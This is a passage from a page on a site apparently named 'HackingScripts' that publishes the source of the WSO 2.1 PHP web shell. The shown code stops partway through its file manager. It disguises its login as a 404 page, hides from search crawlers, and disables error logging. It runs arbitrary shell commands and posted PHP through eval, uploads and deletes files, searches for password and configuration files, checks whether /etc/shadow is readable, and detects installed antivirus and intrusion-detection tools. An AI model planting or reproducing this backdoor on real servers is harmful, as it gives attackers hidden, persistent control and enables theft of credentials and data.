HackingScripts

Hack Scripts for everybody

WSO 2.1 Web Shell

11 Feb 2014

WSO 2.1 Web Shell by devilscafe.in

WSO 2.1 Web Shell Source Code

   1 <?php 
   2 /* WSO 2.1 (Web Shell by devilscafe.in) */ 
   3 $auth_pass = "15de21c670ae7c3f6f3f1f37029303c9"; 
   4 $color = "#00ff00"; 
   5 $default_action = 'FilesMan'; 
   6 @define('SELF_PATH', __FILE__); 
   7 if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { 
   8     header('HTTP/1.0 404 Not Found'); 
   9     exit; 
  10 } 
  11 @session_start(); 
  12 @error_reporting(0); 
  13 @ini_set('error_log',NULL); 
  14 @ini_set('log_errors',0); 
  15 @ini_set('max_execution_time',0); 
  16 @set_time_limit(0); 
  17 @set_magic_quotes_runtime(0); 
  18 @define('VERSION', '2.1'); 
  19 if( get_magic_quotes_gpc() ) { 
  20     function stripslashes_array($array) { 
  21         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); 
  22     } 
  23     $_POST = stripslashes_array($_POST); 
  24 } 
  25 function printLogin() { 
  26     ?> 
  27 <h1>Not Found</h1> 
  28 <p>The requested URL was not found on this server.</p> 
  29 <hr> 
  30 <address>Apache Server at <?=$_SERVER['HTTP_HOST']?> Port 80</address> 
  31     <style> 
  32         input { margin:0;background-color:#fff;border:1px solid #fff; } 
  33     </style> 
  34     <center> 
  35     <form method=post> 
  36     <input type=password name=pass> 
  37     </form></center> 
  38     <?php 
  39     exit; 
  40 } 
  41 if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] )) 
  42     if( empty( $auth_pass ) || 
  43         ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) ) 
  44         $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; 
  45     else 
  46         printLogin(); 
  47 
  48 if( strtolower( substr(PHP_OS,0,3) ) == "win" ) 
  49     $os = 'win'; 
  50 else 
  51     $os = 'nix'; 
  52 $safe_mode = @ini_get('safe_mode'); 
  53 $disable_functions = @ini_get('disable_functions'); 
  54 $home_cwd = @getcwd(); 
  55 if( isset( $_POST['c'] ) ) 
  56     @chdir($_POST['c']); 
  57 $cwd = @getcwd(); 
  58 if( $os == 'win') { 
  59     $home_cwd = str_replace("\\", "/", $home_cwd); 
  60     $cwd = str_replace("\\", "/", $cwd); 
  61 } 
  62 if( $cwd[strlen($cwd)-1] != '/' ) 
  63     $cwd .= '/'; 
  64      
  65 if($os == 'win') 
  66     $aliases = array( 
  67         "List Directory" => "dir", 
  68         "Find index.php in current dir" => "dir /s /w /b index.php", 
  69         "Find *config*.php in current dir" => "dir /s /w /b *config*.php", 
  70         "Show active connections" => "netstat -an", 
  71         "Show running services" => "net start", 
  72         "User accounts" => "net user", 
  73         "Show computers" => "net view", 
  74         "ARP Table" => "arp -a", 
  75         "IP Configuration" => "ipconfig /all" 
  76     ); 
  77 else 
  78     $aliases = array( 
  79           "List dir" => "ls -la", 
  80         "list file attributes on a Linux second extended file system" => "lsattr -va", 
  81           "show opened ports" => "netstat -an | grep -i listen", 
  82         "Find" => "", 
  83           "find all suid files" => "find / -type f -perm -04000 -ls", 
  84           "find suid files in current dir" => "find . -type f -perm -04000 -ls",
  85           "find all sgid files" => "find / -type f -perm -02000 -ls", 
  86           "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
  87           "find config.inc.php files" => "find / -type f -name config.inc.php", 
  88           "find config* files" => "find / -type f -name \"config*\"", 
  89           "find config* files in current dir" => "find . -type f -name \"config*\"", 
  90           "find all writable folders and files" => "find / -perm -2 -ls", 
  91           "find all writable folders and files in current dir" => "find . -perm -2 -ls", 
  92           "find all service.pwd files" => "find / -type f -name service.pwd", 
  93           "find service.pwd files in current dir" => "find . -type f -name service.pwd", 
  94           "find all .htpasswd files" => "find / -type f -name .htpasswd", 
  95           "find .htpasswd files in current dir" => "find . -type f -name .htpasswd", 
  96           "find all .bash_history files" => "find / -type f -name .bash_history", 
  97           "find .bash_history files in current dir" => "find . -type f -name .bash_history", 
  98           "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc", 
  99           "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc", 
 100         "Locate" => "", 
 101           "locate httpd.conf files" => "locate httpd.conf", 
 102         "locate vhosts.conf files" => "locate vhosts.conf", 
 103         "locate proftpd.conf files" => "locate proftpd.conf", 
 104         "locate psybnc.conf files" => "locate psybnc.conf", 
 105         "locate my.conf files" => "locate my.conf", 
 106         "locate admin.php files" =>"locate admin.php", 
 107         "locate cfg.php files" => "locate cfg.php", 
 108         "locate conf.php files" => "locate conf.php", 
 109         "locate config.dat files" => "locate config.dat", 
 110         "locate config.php files" => "locate config.php", 
 111         "locate config.inc files" => "locate config.inc", 
 112         "locate config.inc.php" => "locate config.inc.php", 
 113         "locate config.default.php files" => "locate config.default.php", 
 114         "locate config* files " => "locate config", 
 115         "locate .conf files"=>"locate '.conf'", 
 116         "locate .pwd files" => "locate '.pwd'", 
 117         "locate .sql files" => "locate '.sql'", 
 118         "locate .htpasswd files" => "locate '.htpasswd'", 
 119         "locate .bash_history files" => "locate '.bash_history'", 
 120         "locate .mysql_history files" => "locate '.mysql_history'", 
 121         "locate .fetchmailrc files" => "locate '.fetchmailrc'", 
 122         "locate backup files" => "locate backup", 
 123         "locate dump files" => "locate dump", 
 124         "locate priv files" => "locate priv"     
 125     ); 
 126 
 127 function printHeader() { 
 128     if(empty($_POST['charset'])) 
 129         $_POST['charset'] = "UTF-8"; 
 130     global $color; 
 131     ?> 
 132 <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?=$_POST['charset']?>'><title><?=$_SERVER['HTTP_HOST']?>- 404 Not Found Shell V.<?=VERSION?></title> 
 133 <style> 
 134     body {background-color:#000;color:#fff;} 
 135     body,td,th    { font: 9pt Lucida,Verdana;margin:0;vertical-align:top; } 
 136     span,h1,a    { color:<?=$color?> !important; } 
 137     span        { font-weight: bolder; } 
 138     h1            { border:1px solid <?=$color?>;padding: 2px 5px;font: 14pt Verdana;margin:0px; } 
 139     div.content    { padding: 5px;margin-left:5px;} 
 140     a            { text-decoration:none; } 
 141     a:hover        { background:#ff0000; } 
 142     .ml1        { border:1px solid #444;padding:5px;margin:0;overflow: auto; } 
 143     .bigarea    { width:100%;height:250px; } 
 144     input, textarea, select    { margin:0;color:#00ff00;background-color:#000;border:1px solid <?=$color?>; font: 9pt Monospace,"Courier New"; } 
 145     form        { margin:0px; } 
 146     #toolsTbl    { text-align:center; } 
 147     .toolsInp    { width: 80%; } 
 148     .main th    {text-align:left;} 
 149     .main tr:hover{background-color:#5e5e5e;} 
 150     .main td, th{vertical-align:middle;} 
 151     pre            {font-family:Courier,Monospace;} 
 152     #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);} 
 153 </style> 
 154 <script> 
 155     function set(a,c,p1,p2,p3,charset) { 
 156         if(a != null)document.mf.a.value=a; 
 157         if(c != null)document.mf.c.value=c; 
 158         if(p1 != null)document.mf.p1.value=p1; 
 159         if(p2 != null)document.mf.p2.value=p2; 
 160         if(p3 != null)document.mf.p3.value=p3; 
 161         if(charset != null)document.mf.charset.value=charset; 
 162     } 
 163     function g(a,c,p1,p2,p3,charset) { 
 164         set(a,c,p1,p2,p3,charset); 
 165         document.mf.submit(); 
 166     } 
 167     function a(a,c,p1,p2,p3,charset) { 
 168         set(a,c,p1,p2,p3,charset); 
 169         var params = "ajax=true"; 
 170         for(i=0;i<document.mf.elements.length;i++) 
 171             params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value); 
 172         sr('<?=$_SERVER['REQUEST_URI'];?>', params); 
 173     } 
 174     function sr(url, params) {     
 175         if (window.XMLHttpRequest) { 
 176             req = new XMLHttpRequest(); 
 177             req.onreadystatechange = processReqChange; 
 178             req.open("POST", url, true); 
 179             req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); 
 180             req.send(params); 
 181         }  
 182         else if (window.ActiveXObject) { 
 183             req = new ActiveXObject("Microsoft.XMLHTTP"); 
 184             if (req) { 
 185                 req.onreadystatechange = processReqChange; 
 186                 req.open("POST", url, true); 
 187                 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); 
 188                 req.send(params); 
 189             } 
 190         } 
 191     } 
 192     function processReqChange() { 
 193         if( (req.readyState == 4) ) 
 194             if(req.status == 200) { 
 195                 //alert(req.responseText); 
 196                 var reg = new RegExp("(\\d+)([\\S\\s]*)", "m"); 
 197                 var arr=reg.exec(req.responseText); 
 198                 eval(arr[2].substr(0, arr[1])); 
 199             }  
 200             else alert("Request error!"); 
 201     } 
 202 </script> 
 203 <head><body><div style="position:absolute;width:100%;top:0;left:0;"> 
 204 <form method=post name=mf style='display:none;'> 
 205 <input type=hidden name=a value='<?=isset($_POST['a'])?$_POST['a']:''?>'> 
 206 <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> 
 207 <input type=hidden name=p1 value='<?=isset($_POST['p1'])?htmlspecialchars($_POST['p1']):''?>'> 
 208 <input type=hidden name=p2 value='<?=isset($_POST['p2'])?htmlspecialchars($_POST['p2']):''?>'> 
 209 <input type=hidden name=p3 value='<?=isset($_POST['p3'])?htmlspecialchars($_POST['p3']):''?>'> 
 210 <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
 211 </form> 
 212 <?php 
 213     $freeSpace = @diskfreespace($GLOBALS['cwd']); 
 214     $totalSpace = @disk_total_space($GLOBALS['cwd']); 
 215     $totalSpace = $totalSpace?$totalSpace:1; 
 216     $release = @php_uname('r'); 
 217     $kernel = @php_uname('s'); 
 218     $millink='http://milw0rm.com/search.php?dong='; 
 219     if( strpos('Linux', $kernel) !== false ) 
 220         $millink .= urlencode( 'Linux Kernel ' . substr($release,0,6) ); 
 221     else 
 222         $millink .= urlencode( $kernel . ' ' . substr($release,0,3) ); 
 223     if(!function_exists('posix_getegid')) { 
 224         $user = @get_current_user(); 
 225         $uid = @getmyuid(); 
 226         $gid = @getmygid(); 
 227         $group = "?"; 
 228     } else { 
 229         $uid = @posix_getpwuid(@posix_geteuid()); 
 230         $gid = @posix_getgrgid(@posix_getegid()); 
 231         $user = $uid['name']; 
 232         $uid = $uid['uid']; 
 233         $group = $gid['name']; 
 234         $gid = $gid['gid']; 
 235     } 
 236     $cwd_links = ''; 
 237     $path = explode("/", $GLOBALS['cwd']); 
 238     $n=count($path); 
 239     for($i=0;$i<$n-1;$i++) { 
 240         $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\""; 
 241         for($j=0;$j<=$i;$j++) 
 242             $cwd_links .= $path[$j].'/'; 
 243         $cwd_links .= "\")'>".$path[$i]."/</a>"; 
 244     } 
 245     $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866'); 
 246     $opt_charsets = ''; 
 247     foreach($charsets as $item) 
 248         $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>'; 
 249     $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Sql'=>'Sql','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network'); 
 250     if(!empty($GLOBALS['auth_pass'])) 
 251     $m['Logout'] = 'Logout'; 
 252     $m['Self remove'] = 'SelfRemove'; 
 253     $menu = ''; 
 254     foreach($m as $k => $v) 
 255         $menu .= '<th width="'.(int)(100/count($m)).'%">[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>'; 
 256     $drives = ""; 
 257     if ($GLOBALS['os'] == 'win') { 
 258         foreach( range('a','z') as $drive ) 
 259         if (is_dir($drive.':\\')) 
 260             $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> '; 
 261     } 
 262     echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname<br>User<br>Php<br>Hdd<br>Cwd'.($GLOBALS['os'] == 'win'?'<br>Drives':'').'</span></td>'. 
 263          '<td>:<nobr>'.substr(@php_uname(), 0, 120).'  <a href="http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[Google]</a> <a href="'.$millink.'" target=_blank>[milw0rm]</a></nobr><br>:'.$uid.' ( '.$user.' ) <span>Group:</span> '.$gid.' ( '.$group.' )<br>:'.@phpversion().' <span>Safe mode:</span> '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=<?=$color?><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a> <span>Datetime:</span> '.date('Y-m-d H:i:s').'<br>:'.viewSize($totalSpace).' <span>Free:</span> '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>:'.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a><br>:'.$drives.'</td>'. 
 264          '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">'.$opt_charsets.'</optgroup></select><br><span>Server IP:</span><br>'.gethostbyname($_SERVER["HTTP_HOST"]).'<br><span>Client IP:</span><br>'.$_SERVER['REMOTE_ADDR'].'</nobr></td></tr></table>'. 
 265          '<table cellpadding=3 cellspacing=0 width=100%><tr>'.$menu.'</tr></table><div style="margin:5">'; 
 266 } 
 267 
 268 function printFooter() { 
 269     $is_writable = is_writable($GLOBALS['cwd'])?"<font color=green>[ Writeable ]</font>":"<font color=red>[ Not writable ]</font>"; 
 270 ?> 
 271 </div> 
 272 <table class=info id=toolsTbl cellpadding=0 cellspacing=0 width=100%"> 
 273     <tr> 
 274         <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="<?=htmlspecialchars($GLOBALS['cwd']);?>"><input type=submit value=">>"></form></td> 
 275         <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td> 
 276     </tr> 
 277     <tr> 
 278         <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form><?=$is_writable?></td> 
 279         <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form><?=$is_writable?></td> 
 280     </tr> 
 281     <tr> 
 282         <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td> 
 283         <td><form method='post' ENCTYPE='multipart/form-data'> 
 284         <input type=hidden name=a value='FilesMAn'> 
 285         <input type=hidden name=c value='<?=htmlspecialchars($GLOBALS['cwd'])?>'> 
 286         <input type=hidden name=p1 value='uploadFile'> 
 287         <input type=hidden name=charset value='<?=isset($_POST['charset'])?$_POST['charset']:''?>'> 
 288         <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form><?=$is_writable?></td> 
 289     </tr> 
 290 
 291 </table> 
 292 </div> 
 293 </body></html> 
 294 <?php 
 295 } 
 296 if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
 297 if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
 298 function ex($in) { 
 299     $out = ''; 
 300     if(function_exists('exec')) { 
 301         @exec($in,$out); 
 302         $out = @join("\n",$out); 
 303     }elseif(function_exists('passthru')) { 
 304         ob_start(); 
 305         @passthru($in); 
 306         $out = ob_get_clean(); 
 307     }elseif(function_exists('system')) { 
 308         ob_start(); 
 309         @system($in); 
 310         $out = ob_get_clean(); 
 311     }elseif(function_exists('shell_exec')) { 
 312         $out = shell_exec($in); 
 313     }elseif(is_resource($f = @popen($in,"r"))) { 
 314         $out = ""; 
 315         while(!@feof($f)) 
 316             $out .= fread($f,1024); 
 317         pclose($f); 
 318     } 
 319     return $out; 
 320 } 
 321 function viewSize($s) { 
 322     if($s >= 1073741824) 
 323         return sprintf('%1.2f', $s / 1073741824 ). ' GB'; 
 324     elseif($s >= 1048576) 
 325         return sprintf('%1.2f', $s / 1048576 ) . ' MB'; 
 326     elseif($s >= 1024) 
 327         return sprintf('%1.2f', $s / 1024 ) . ' KB'; 
 328     else 
 329         return $s . ' B'; 
 330 } 
 331 
 332 function perms($p) { 
 333     if (($p & 0xC000) == 0xC000)$i = 's'; 
 334     elseif (($p & 0xA000) == 0xA000)$i = 'l'; 
 335     elseif (($p & 0x8000) == 0x8000)$i = '-'; 
 336     elseif (($p & 0x6000) == 0x6000)$i = 'b'; 
 337     elseif (($p & 0x4000) == 0x4000)$i = 'd'; 
 338     elseif (($p & 0x2000) == 0x2000)$i = 'c'; 
 339     elseif (($p & 0x1000) == 0x1000)$i = 'p'; 
 340     else $i = 'u'; 
 341     $i .= (($p & 0x0100) ? 'r' : '-'); 
 342     $i .= (($p & 0x0080) ? 'w' : '-'); 
 343     $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-')); 
 344     $i .= (($p & 0x0020) ? 'r' : '-'); 
 345     $i .= (($p & 0x0010) ? 'w' : '-'); 
 346     $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-')); 
 347     $i .= (($p & 0x0004) ? 'r' : '-'); 
 348     $i .= (($p & 0x0002) ? 'w' : '-'); 
 349     $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-')); 
 350     return $i; 
 351 } 
 352 function viewPermsColor($f) {  
 353     if (!@is_readable($f)) 
 354         return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>'; 
 355     elseif (!@is_writable($f)) 
 356         return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>'; 
 357     else 
 358         return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>'; 
 359 } 
 360 if(!function_exists("scandir")) { 
 361     function scandir($dir) { 
 362         $dh  = opendir($dir); 
 363         while (false !== ($filename = readdir($dh))) { 
 364             $files[] = $filename; 
 365         } 
 366         return $files; 
 367     } 
 368 } 
 369 function which($p) { 
 370     $path = ex('which '.$p); 
 371     if(!empty($path)) 
 372         return $path; 
 373     return false; 
 374 } 
 375 function actionSecInfo() { 
 376     printHeader(); 
 377     echo '<h1>Server security information</h1><div class=content>'; 
 378     function showSecParam($n, $v) { 
 379         $v = trim($v); 
 380         if($v) { 
 381             echo '<span>'.$n.': </span>'; 
 382             if(strpos($v, "\n") === false) 
 383                 echo $v.'<br>'; 
 384             else 
 385                 echo '<pre class=ml1>'.$v.'</pre>'; 
 386         } 
 387     } 
 388      
 389     showSecParam('Server software', @getenv('SERVER_SOFTWARE')); 
 390     showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none'); 
 391     showSecParam('Open base dir', @ini_get('open_basedir')); 
 392     showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); 
 393     showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir')); 
 394     showSecParam('cURL support', function_exists('curl_version')?'enabled':'no'); 
 395     $temp=array(); 
 396     if(function_exists('mysql_get_client_info')) 
 397         $temp[] = "MySql (".mysql_get_client_info().")"; 
 398     if(function_exists('mssql_connect')) 
 399         $temp[] = "MSSQL"; 
 400     if(function_exists('pg_connect')) 
 401         $temp[] = "PostgreSQL"; 
 402     if(function_exists('oci_connect')) 
 403         $temp[] = "Oracle"; 
 404     showSecParam('Supported databases', implode(', ', $temp)); 
 405     echo '<br>'; 
 406      
 407     if( $GLOBALS['os'] == 'nix' ) { 
 408         $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); 
 409         $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); 
 410         $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); 
 411         showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no'); 
 412         showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no'); 
 413         showSecParam('OS version', @file_get_contents('/proc/version')); 
 414         showSecParam('Distr name', @file_get_contents('/etc/issue.net')); 
 415         if(!$GLOBALS['safe_mode']) { 
 416             echo '<br>'; 
 417             $temp=array(); 
 418             foreach ($userful as $item) 
 419                 if(which($item)){$temp[]=$item;} 
 420             showSecParam('Userful', implode(', ',$temp)); 
 421             $temp=array(); 
 422             foreach ($danger as $item) 
 423                 if(which($item)){$temp[]=$item;} 
 424             showSecParam('Danger', implode(', ',$temp)); 
 425             $temp=array(); 
 426             foreach ($downloaders as $item)  
 427                 if(which($item)){$temp[]=$item;} 
 428             showSecParam('Downloaders', implode(', ',$temp)); 
 429             echo '<br/>'; 
 430             showSecParam('Hosts', @file_get_contents('/etc/hosts')); 
 431             showSecParam('HDD space', ex('df -h')); 
 432             showSecParam('Mount options', @file_get_contents('/etc/fstab')); 
 433         } 
 434     } else { 
 435         showSecParam('OS Version',ex('ver'));  
 436         showSecParam('Account Settings',ex('net accounts'));  
 437         showSecParam('User Accounts',ex('net user')); 
 438     } 
 439     echo '</div>'; 
 440     printFooter(); 
 441 } 
 442 
 443 function actionPhp() { 
 444     if( isset($_POST['ajax']) ) { 
 445         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true; 
 446         ob_start(); 
 447         eval($_POST['p1']); 
 448         $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'&#92;&#48;")."';\n"; 
 449         echo strlen($temp), "\n", $temp; 
 450         exit;  
 451     } 
 452     printHeader(); 
 453     if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) { 
 454         echo '<h1>PHP info</h1><div class=content>'; 
 455         ob_start(); 
 456         phpinfo(); 
 457         $tmp = ob_get_clean(); 
 458         $tmp = preg_replace('!body {.*}!msiU','',$tmp); 
 459         $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp); 
 460         $tmp = preg_replace('!h1!msiU','h2',$tmp); 
 461         $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp); 
 462         $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp); 
 463         echo $tmp; 
 464         echo '</div><br>'; 
 465     } 
 466     if(empty($_POST['ajax'])&&!empty($_POST['p1'])) 
 467         $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false; 
 468         echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">'; 
 469     echo ' <input type=checkbox name=ajax value=1 '.($_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>'; 
 470     if(!empty($_POST['p1'])) { 
 471         ob_start(); 
 472         eval($_POST['p1']); 
 473         echo htmlspecialchars(ob_get_clean()); 
 474     } 
 475     echo '</pre></div>'; 
 476     printFooter(); 
 477 } 
 478 
 479 function actionFilesMan() { 
 480     printHeader(); 
 481     echo '<h1>File manager</h1><div class=content>'; 
 482     if(isset($_POST['p1'])) { 
 483         switch($_POST['p1']) { 
 484             case 'uploadFile': 
 485                 if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name'])) 
 486                     echo "Can't upload file!"; 
 487                 break; 
 488                 break; 
 489             case 'mkdir': 
 490                 if(!@mkdir($_POST['p2'])) 
 491                     echo "Can't create new dir"; 
 492                 break; 
 493             case 'delete': 
 494                 function deleteDir($path) { 
 495                     $path = (substr($path,-1)=='/') ? $path:$path.'/'; 
 496                     $dh  = opendir($path); 
 497                     while ( ($item = readdir($dh) ) !== false) { 
 498                         $item = $path.$item; 
 499                         if ( (basename($item) == "..") || (basename($item) == ".") ) 
 500                             continue; 
 501                         $type = filetype($item); 
 502                         if ($type == "dir") 
 503                             deleteDir($item); 
 504                         else 
 505                             @unlink($item); 
 506                     } 
 507                     closedir($dh); 
 508                     rmdir($path); 
 509                 } 
 510                 if(is_array(@$_POST['f'])) 
 511                     foreach($_POST['f'] as $f) { 
 512                         $f = urldecode($f); 
 513                         if(is_dir($f)) 
 514                             deleteDir($f); 
 515                         else 
 516                             @unlink($f); 
 517                     } 
 518                 break; 
 519             case 'paste': 
 520                 if($_SESSION['act'] == 'copy') { 
 521                     function copy_paste($c,$s,$d){ 
 522                         if(is_dir($c.$s)){ 
 523                             mkdir($d.$s); 
 524                             $h = opendir($c.$s); 
 525                             while (($f = readdir($h)) !== false) 
 526                                 if (($f != ".") and ($f != "..")) { 
 527                                     copy_paste($c.$s.'/',$f, $d.$s.'/'); 
 528                                 } 
 529                         } elseif(is_file($c.$s)) { 
 530                             @copy($c.$s, $d.$s); 
 531                         } 
 532                     } 
 533                     foreach($_SESSION['f'] as $f) 
 534                         copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);                     
 535                 } elseif($_SESSION['act'] == 'move') { 
 536                     function move_paste($c,$s,$d){ 
 537                         if(is_dir($c.$s)){ 
 538                             mkdir($d.$s); 
 539                             $h = opendir($c.$s); 
 540                             while (($f = readdir($h)) !== false) 
 541                                 if (($f != ".") and ($f != "..")) { 
 542                                     copy_paste($c.$s.'/',$f, $d.$s.'/'); 
 543                                 } 
 544                         } elseif(is_file($c.$s)) { 
 545                             @copy($c.$s, $d.$s); 
 546                         } 
 547                     } 
 548                     foreach($_SESSION['f'] as $f) 
 549                         @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f); 
 550                 } 
 551                 unset($_SESSION['f']); 
 552                 break; 
 553             default: 
 554                 if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) { 
 555                     $_SESSION['act'] = @$_POST['p1']; 
 556                     $_SESSION['f'] = @$_POST['f']; 
 557                     foreach($_SESSION['f'] as $k => $f) 
 558                         $_SESSION['f'][$k] = urldecode($f); 
 559                     $_SESSION['cwd'] = @$_POST['c']; 
 560                 } 
 561                 break; 
 562         } 
 563         echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>'; 
 564     } 
 565     $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']); 
 566     if($dirContent === false) {    echo 'Can\'t open this folder!'; return;    }
 567     global $sort; 
 568     $sort = array('name', 1); 
 569     if(!empty($_POST['p1'])) { 
 570         if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match)) 
 571             $sort = array($match[1], (int)$match[2]); 
 572     } 
 573 ?> 
 574 <script> 
 575     function sa() { 
 576         for(i=0;i<document.files.elements.length;i++) 
 577             if(document.files.elements[i].type == 'checkbox') 
 578                 document.files.elements[i].checked = document.files.elements[0].checked; 
 579     } 
 580 </script> 
 581 <table width='100%' class='main' cellspacing='0' cellpadding='2'> 
 582 <form name=files method=post> 
 583 <?php 
 584     echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>"; 
 585     $dirs = $files = $links = array(); 
 586     $n = count($dirContent); 
 587     for($i=0;$i<$n;$i++) { 
 588         $ow = @posix_getpwuid(@fileowner($dirContent[$i])); 
 589         $gr = @posix_getgrgid(@filegroup($dirContent[$i])); 
 590         $tmp = array('name' => $dirContent[$i], 
 591                      'path' => $GLOBALS['cwd'].$dirContent[$i], 
 592                      'modify' => date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])), 
 593                      'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
 594                      'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]), 
 595                      'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]), 
 596                      'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i]) 
 597                     ); 
 598         if(@is_file($GLOBALS['cwd'].$dirContent[$i])) 
 599             $files[] = array_merge($tmp, array('type' => 'file')); 
